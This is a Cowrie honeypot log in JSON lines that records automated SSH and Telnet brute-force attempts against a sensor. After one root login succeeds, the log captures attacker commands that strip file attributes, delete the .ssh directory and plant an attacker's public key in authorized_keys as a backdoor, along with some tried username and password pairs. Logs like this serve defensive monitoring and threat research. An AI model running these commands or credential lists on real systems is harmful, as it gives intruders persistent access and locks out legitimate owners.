{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:26:40.219776Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:40.220682Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":44588,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4bec2f14c21","protocol":"ssh","message":"New connection: 213.6.203.226:44588 (1.2.3.4:22) [session: f4bec2f14c21]","sensor":"my-vps","timestamp":"2025-09-09T05:26:40.286503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:26:40.287349Z","src_ip":"213.6.203.226","session":"f4bec2f14c21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:26:40.354927Z","src_ip":"213.6.203.226","session":"f4bec2f14c21"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:26:40.669079Z","src_ip":"213.6.203.226","session":"f4bec2f14c21"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:41.738575Z","src_ip":"213.6.203.226","session":"f4bec2f14c21"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":34952,"dst_ip":"1.2.3.4","dst_port":22,"session":"67088bafec0f","protocol":"ssh","message":"New connection: 213.6.203.226:34952 (1.2.3.4:22) [session: 67088bafec0f]","sensor":"my-vps","timestamp":"2025-09-09T05:26:41.805311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:26:41.806270Z","src_ip":"213.6.203.226","session":"67088bafec0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:26:41.873810Z","src_ip":"213.6.203.226","session":"67088bafec0f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:26:42.184678Z","src_ip":"213.6.203.226","session":"67088bafec0f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:42.253803Z","src_ip":"213.6.203.226","session":"9459d798bff7"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:42.254647Z","src_ip":"213.6.203.226","session":"67088bafec0f"}
{"eventid":"cowrie.session.closed","duration":12.759982347488403,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:43.322138Z","src_ip":"212.227.235.229","session":"8363ce72920e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47669,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae9b0cf8ec08","protocol":"telnet","message":"New connection: 212.227.235.229:47669 (1.2.3.4:23) [session: ae9b0cf8ec08]","sensor":"my-vps","timestamp":"2025-09-09T05:26:43.555642Z"}
{"eventid":"cowrie.session.closed","duration":12.769343852996826,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:26:56.324916Z","src_ip":"212.227.235.229","session":"ae9b0cf8ec08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47989,"dst_ip":"1.2.3.4","dst_port":23,"session":"f704de67137b","protocol":"telnet","message":"New connection: 212.227.235.229:47989 (1.2.3.4:23) [session: f704de67137b]","sensor":"my-vps","timestamp":"2025-09-09T05:26:56.532822Z"}
{"eventid":"cowrie.session.closed","duration":12.782947778701782,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:27:09.315703Z","src_ip":"212.227.235.229","session":"f704de67137b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48290,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa510215930d","protocol":"telnet","message":"New connection: 212.227.235.229:48290 (1.2.3.4:23) [session: fa510215930d]","sensor":"my-vps","timestamp":"2025-09-09T05:27:09.649418Z"}
{"eventid":"cowrie.session.closed","duration":12.739474534988403,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:27:22.388831Z","src_ip":"212.227.235.229","session":"fa510215930d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48594,"dst_ip":"1.2.3.4","dst_port":23,"session":"e0c85e7db231","protocol":"telnet","message":"New connection: 212.227.235.229:48594 (1.2.3.4:23) [session: e0c85e7db231]","sensor":"my-vps","timestamp":"2025-09-09T05:27:22.595732Z"}
{"eventid":"cowrie.session.closed","duration":12.739756345748901,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:27:35.335422Z","src_ip":"212.227.235.229","session":"e0c85e7db231"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48913,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f75ad854901","protocol":"telnet","message":"New connection: 212.227.235.229:48913 (1.2.3.4:23) [session: 5f75ad854901]","sensor":"my-vps","timestamp":"2025-09-09T05:27:35.560110Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57162,"dst_ip":"1.2.3.4","dst_port":22,"session":"48638bd4d5e6","protocol":"ssh","message":"New connection: 217.72.205.35:57162 (1.2.3.4:22) [session: 48638bd4d5e6]","sensor":"my-vps","timestamp":"2025-09-09T05:27:38.051853Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:27:38.052899Z","src_ip":"217.72.205.35","session":"48638bd4d5e6"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":36919,"dst_ip":"1.2.3.4","dst_port":22,"session":"68d2531f544c","protocol":"ssh","message":"New connection: 213.6.203.226:36919 (1.2.3.4:22) [session: 68d2531f544c]","sensor":"my-vps","timestamp":"2025-09-09T05:27:46.302260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:27:46.303291Z","src_ip":"213.6.203.226","session":"68d2531f544c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:27:46.376549Z","src_ip":"213.6.203.226","session":"68d2531f544c"}
{"eventid":"cowrie.login.failed","username":"client","password":"client","message":"login attempt [client/client] failed","sensor":"my-vps","timestamp":"2025-09-09T05:27:46.684699Z","src_ip":"213.6.203.226","session":"68d2531f544c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:27:47.754071Z","src_ip":"213.6.203.226","session":"68d2531f544c"}
{"eventid":"cowrie.session.closed","duration":12.719311714172363,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:27:48.279328Z","src_ip":"212.227.235.229","session":"5f75ad854901"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":35448,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4d8119661d3","protocol":"ssh","message":"New connection: 213.6.203.226:35448 (1.2.3.4:22) [session: b4d8119661d3]","sensor":"my-vps","timestamp":"2025-09-09T05:28:49.435789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:28:49.436675Z","src_ip":"213.6.203.226","session":"b4d8119661d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:28:49.509545Z","src_ip":"213.6.203.226","session":"b4d8119661d3"}
{"eventid":"cowrie.login.failed","username":"core","password":"123456789","message":"login attempt [core/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T05:28:49.839362Z","src_ip":"213.6.203.226","session":"b4d8119661d3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:28:50.913753Z","src_ip":"213.6.203.226","session":"b4d8119661d3"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":43254,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9b74d11b844","protocol":"ssh","message":"New connection: 92.118.39.62:43254 (1.2.3.4:22) [session: d9b74d11b844]","sensor":"my-vps","timestamp":"2025-09-09T05:29:47.367187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:29:47.368116Z","src_ip":"92.118.39.62","session":"d9b74d11b844"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:29:47.398268Z","src_ip":"92.118.39.62","session":"d9b74d11b844"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-09-09T05:29:47.490320Z","src_ip":"92.118.39.62","session":"d9b74d11b844"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:29:48.524090Z","src_ip":"92.118.39.62","session":"d9b74d11b844"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":61458,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3052dafeee9","protocol":"ssh","message":"New connection: 213.6.203.226:61458 (1.2.3.4:22) [session: a3052dafeee9]","sensor":"my-vps","timestamp":"2025-09-09T05:29:54.171561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:29:54.172570Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:29:54.240410Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.login.success","username":"root","password":"athena2025","message":"login attempt [root/athena2025] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:29:54.553944Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:29:54.751280Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:29:54.752070Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:29:54.752866Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:29:54.822127Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:29:54.975372Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:29:54.976037Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:29:55.047615Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:29:55.048575Z","src_ip":"213.6.203.226","session":"a3052dafeee9"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":56529,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6daf1a26106","protocol":"ssh","message":"New connection: 213.6.203.226:56529 (1.2.3.4:22) [session: a6daf1a26106]","sensor":"my-vps","timestamp":"2025-09-09T05:29:55.115094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:29:55.115806Z","src_ip":"213.6.203.226","session":"a6daf1a26106"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:29:55.184521Z","src_ip":"213.6.203.226","session":"a6daf1a26106"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:29:55.501045Z","src_ip":"213.6.203.226","session":"a6daf1a26106"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:29:56.572323Z","src_ip":"213.6.203.226","session":"a6daf1a26106"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":56188,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d24f6a05652","protocol":"ssh","message":"New connection: 213.6.203.226:56188 (1.2.3.4:22) [session: 5d24f6a05652]","sensor":"my-vps","timestamp":"2025-09-09T05:29:56.638712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:29:56.639349Z","src_ip":"213.6.203.226","session":"5d24f6a05652"}
